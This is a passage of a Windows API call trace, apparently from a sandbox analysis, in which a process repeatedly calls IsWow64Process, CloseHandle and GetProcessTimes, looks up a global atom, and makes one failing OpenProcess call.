	[0136.974] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.975] CloseHandle (hObject=0x2dc) returned 1
	[0136.975] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.975] CloseHandle (hObject=0x2dc) returned 1
	[0136.975] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.975] CloseHandle (hObject=0x2dc) returned 1
	[0136.975] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.975] CloseHandle (hObject=0x2dc) returned 1
	[0136.976] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.976] CloseHandle (hObject=0x2dc) returned 1
	[0136.976] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.976] CloseHandle (hObject=0x2dc) returned 1
	[0136.976] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.976] CloseHandle (hObject=0x2dc) returned 1
	[0136.976] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.976] CloseHandle (hObject=0x2dc) returned 1
	[0136.976] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.976] CloseHandle (hObject=0x2dc) returned 1
	[0136.977] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.977] CloseHandle (hObject=0x2dc) returned 1
	[0136.977] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.977] CloseHandle (hObject=0x2dc) returned 1
	[0136.977] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.977] CloseHandle (hObject=0x2dc) returned 1
	[0136.977] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.977] CloseHandle (hObject=0x2dc) returned 1
	[0136.978] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.978] CloseHandle (hObject=0x2dc) returned 1
	[0136.978] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.978] CloseHandle (hObject=0x2dc) returned 1
	[0136.978] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.978] CloseHandle (hObject=0x2dc) returned 1
	[0136.978] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.978] CloseHandle (hObject=0x2dc) returned 1
	[0136.979] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.979] CloseHandle (hObject=0x2dc) returned 1
	[0136.979] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.979] CloseHandle (hObject=0x2dc) returned 1
	[0136.979] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.979] CloseHandle (hObject=0x2dc) returned 1
	[0136.980] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.980] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.980] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.980] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.980] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.981] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.981] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.981] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.981] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.981] CloseHandle (hObject=0x2dc) returned 1
	[0136.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.981] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.981] CloseHandle (hObject=0x2dc) returned 1
	[0136.981] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.982] CloseHandle (hObject=0x2dc) returned 1
	[0136.982] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.982] CloseHandle (hObject=0x2dc) returned 1
	[0136.982] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.982] CloseHandle (hObject=0x2dc) returned 1
	[0136.982] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.982] CloseHandle (hObject=0x2dc) returned 1
	[0137.015] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.015] CloseHandle (hObject=0x2dc) returned 1
	[0137.015] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.015] CloseHandle (hObject=0x2dc) returned 1
	[0137.015] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.016] CloseHandle (hObject=0x2dc) returned 1
	[0137.016] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.016] CloseHandle (hObject=0x2dc) returned 1
	[0137.016] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.016] CloseHandle (hObject=0x2dc) returned 1
	[0137.016] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.016] CloseHandle (hObject=0x2dc) returned 1
	[0137.017] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.017] CloseHandle (hObject=0x2dc) returned 1
	[0137.017] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.017] CloseHandle (hObject=0x2dc) returned 1
	[0137.017] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.017] CloseHandle (hObject=0x2dc) returned 1
	[0137.017] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.017] CloseHandle (hObject=0x2dc) returned 1
	[0137.018] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.018] CloseHandle (hObject=0x2dc) returned 1
	[0137.018] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.018] CloseHandle (hObject=0x2dc) returned 1
	[0137.018] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.018] CloseHandle (hObject=0x2dc) returned 1
	[0137.018] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.018] CloseHandle (hObject=0x2dc) returned 1
	[0137.019] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.019] CloseHandle (hObject=0x2dc) returned 1
	[0137.019] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.019] CloseHandle (hObject=0x2dc) returned 1
	[0137.019] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.019] CloseHandle (hObject=0x2dc) returned 1
	[0137.019] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.019] CloseHandle (hObject=0x2dc) returned 1
	[0137.020] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.020] CloseHandle (hObject=0x2dc) returned 1
	[0137.020] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.020] CloseHandle (hObject=0x2dc) returned 1
	[0137.020] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.020] CloseHandle (hObject=0x2dc) returned 1
	[0137.021] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.021] CloseHandle (hObject=0x2dc) returned 1
	[0137.021] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.021] CloseHandle (hObject=0x2dc) returned 1
	[0137.021] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.021] CloseHandle (hObject=0x2dc) returned 1
	[0137.021] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.021] CloseHandle (hObject=0x2dc) returned 1
	[0137.021] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.022] CloseHandle (hObject=0x2dc) returned 1
	[0137.022] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.022] CloseHandle (hObject=0x2dc) returned 1
	[0137.022] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.022] CloseHandle (hObject=0x2dc) returned 1
	[0137.022] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.022] CloseHandle (hObject=0x2dc) returned 1
	[0137.022] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.022] CloseHandle (hObject=0x2dc) returned 1
	[0137.023] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.023] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.023] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.023] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.024] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.024] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.024] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.024] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.024] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.024] CloseHandle (hObject=0x2dc) returned 1
	[0137.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.024] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.024] CloseHandle (hObject=0x2dc) returned 1
	[0137.025] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.025] CloseHandle (hObject=0x2dc) returned 1
	[0137.025] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.025] CloseHandle (hObject=0x2dc) returned 1
	[0137.025] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.025] CloseHandle (hObject=0x2dc) returned 1
	[0137.025] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.025] CloseHandle (hObject=0x2dc) returned 1
	[0137.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.065] CloseHandle (hObject=0x2dc) returned 1
	[0137.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.065] CloseHandle (hObject=0x2dc) returned 1
	[0137.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.065] CloseHandle (hObject=0x2dc) returned 1
	[0137.065] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.066] CloseHandle (hObject=0x2dc) returned 1
	[0137.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.066] CloseHandle (hObject=0x2dc) returned 1
	[0137.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.066] CloseHandle (hObject=0x2dc) returned 1
	[0137.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.066] CloseHandle (hObject=0x2dc) returned 1
	[0137.066] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.066] CloseHandle (hObject=0x2dc) returned 1
	[0137.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.067] CloseHandle (hObject=0x2dc) returned 1
	[0137.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.067] CloseHandle (hObject=0x2dc) returned 1
	[0137.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.067] CloseHandle (hObject=0x2dc) returned 1
	[0137.067] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.067] CloseHandle (hObject=0x2dc) returned 1
	[0137.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.068] CloseHandle (hObject=0x2dc) returned 1
	[0137.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.068] CloseHandle (hObject=0x2dc) returned 1
	[0137.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.068] CloseHandle (hObject=0x2dc) returned 1
	[0137.068] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.068] CloseHandle (hObject=0x2dc) returned 1
	[0137.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.069] CloseHandle (hObject=0x2dc) returned 1
	[0137.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.069] CloseHandle (hObject=0x2dc) returned 1
	[0137.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.069] CloseHandle (hObject=0x2dc) returned 1
	[0137.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.069] CloseHandle (hObject=0x2dc) returned 1
	[0137.069] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.070] CloseHandle (hObject=0x2dc) returned 1
	[0137.070] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.070] CloseHandle (hObject=0x2dc) returned 1
	[0137.070] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.070] CloseHandle (hObject=0x2dc) returned 1
	[0137.070] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.070] CloseHandle (hObject=0x2dc) returned 1
	[0137.070] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.070] CloseHandle (hObject=0x2dc) returned 1
	[0137.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.071] CloseHandle (hObject=0x2dc) returned 1
	[0137.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.071] CloseHandle (hObject=0x2dc) returned 1
	[0137.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.071] CloseHandle (hObject=0x2dc) returned 1
	[0137.071] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.071] CloseHandle (hObject=0x2dc) returned 1
	[0137.072] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.072] CloseHandle (hObject=0x2dc) returned 1
	[0137.072] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.072] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.072] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.073] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.073] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.073] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.073] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.073] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.073] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.074] CloseHandle (hObject=0x2dc) returned 1
	[0137.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.074] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.074] CloseHandle (hObject=0x2dc) returned 1
	[0137.074] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.074] CloseHandle (hObject=0x2dc) returned 1
	[0137.074] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.074] CloseHandle (hObject=0x2dc) returned 1
	[0137.075] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.075] CloseHandle (hObject=0x2dc) returned 1
	[0137.075] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.075] CloseHandle (hObject=0x2dc) returned 1
	[0137.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.113] CloseHandle (hObject=0x2dc) returned 1
	[0137.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.114] CloseHandle (hObject=0x2dc) returned 1
	[0137.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.114] CloseHandle (hObject=0x2dc) returned 1
	[0137.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.114] CloseHandle (hObject=0x2dc) returned 1
	[0137.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.114] CloseHandle (hObject=0x2dc) returned 1
	[0137.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.115] CloseHandle (hObject=0x2dc) returned 1
	[0137.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.115] CloseHandle (hObject=0x2dc) returned 1
	[0137.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.115] CloseHandle (hObject=0x2dc) returned 1
	[0137.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.115] CloseHandle (hObject=0x2dc) returned 1
	[0137.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.116] CloseHandle (hObject=0x2dc) returned 1
	[0137.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.116] CloseHandle (hObject=0x2dc) returned 1
	[0137.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.116] CloseHandle (hObject=0x2dc) returned 1
	[0137.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.116] CloseHandle (hObject=0x2dc) returned 1
	[0137.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.116] CloseHandle (hObject=0x2dc) returned 1
	[0137.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.117] CloseHandle (hObject=0x2dc) returned 1
	[0137.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.117] CloseHandle (hObject=0x2dc) returned 1
	[0137.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.117] CloseHandle (hObject=0x2dc) returned 1
	[0137.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.117] CloseHandle (hObject=0x2dc) returned 1
	[0137.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.118] CloseHandle (hObject=0x2dc) returned 1
	[0137.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.118] CloseHandle (hObject=0x2dc) returned 1
	[0137.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.118] CloseHandle (hObject=0x2dc) returned 1
	[0137.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.118] CloseHandle (hObject=0x2dc) returned 1
	[0137.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.119] CloseHandle (hObject=0x2dc) returned 1
	[0137.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.119] CloseHandle (hObject=0x2dc) returned 1
	[0137.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.119] CloseHandle (hObject=0x2dc) returned 1
	[0137.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.119] CloseHandle (hObject=0x2dc) returned 1
	[0137.120] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.120] CloseHandle (hObject=0x2dc) returned 1
	[0137.120] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.120] CloseHandle (hObject=0x2dc) returned 1
	[0137.120] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.120] CloseHandle (hObject=0x2dc) returned 1
	[0137.121] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.121] CloseHandle (hObject=0x2dc) returned 1
	[0137.121] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.121] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.121] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.122] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.122] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.122] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.122] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.122] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.122] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.122] CloseHandle (hObject=0x2dc) returned 1
	[0137.123] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.123] CloseHandle (hObject=0x2dc) returned 1
	[0137.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.123] CloseHandle (hObject=0x2dc) returned 1
	[0137.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.123] CloseHandle (hObject=0x2dc) returned 1
	[0137.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.123] CloseHandle (hObject=0x2dc) returned 1
	[0137.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.124] CloseHandle (hObject=0x2dc) returned 1
	[0137.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.159] CloseHandle (hObject=0x2dc) returned 1
	[0137.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.160] CloseHandle (hObject=0x2dc) returned 1
	[0137.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.160] CloseHandle (hObject=0x2dc) returned 1
	[0137.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.160] CloseHandle (hObject=0x2dc) returned 1
	[0137.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.160] CloseHandle (hObject=0x2dc) returned 1
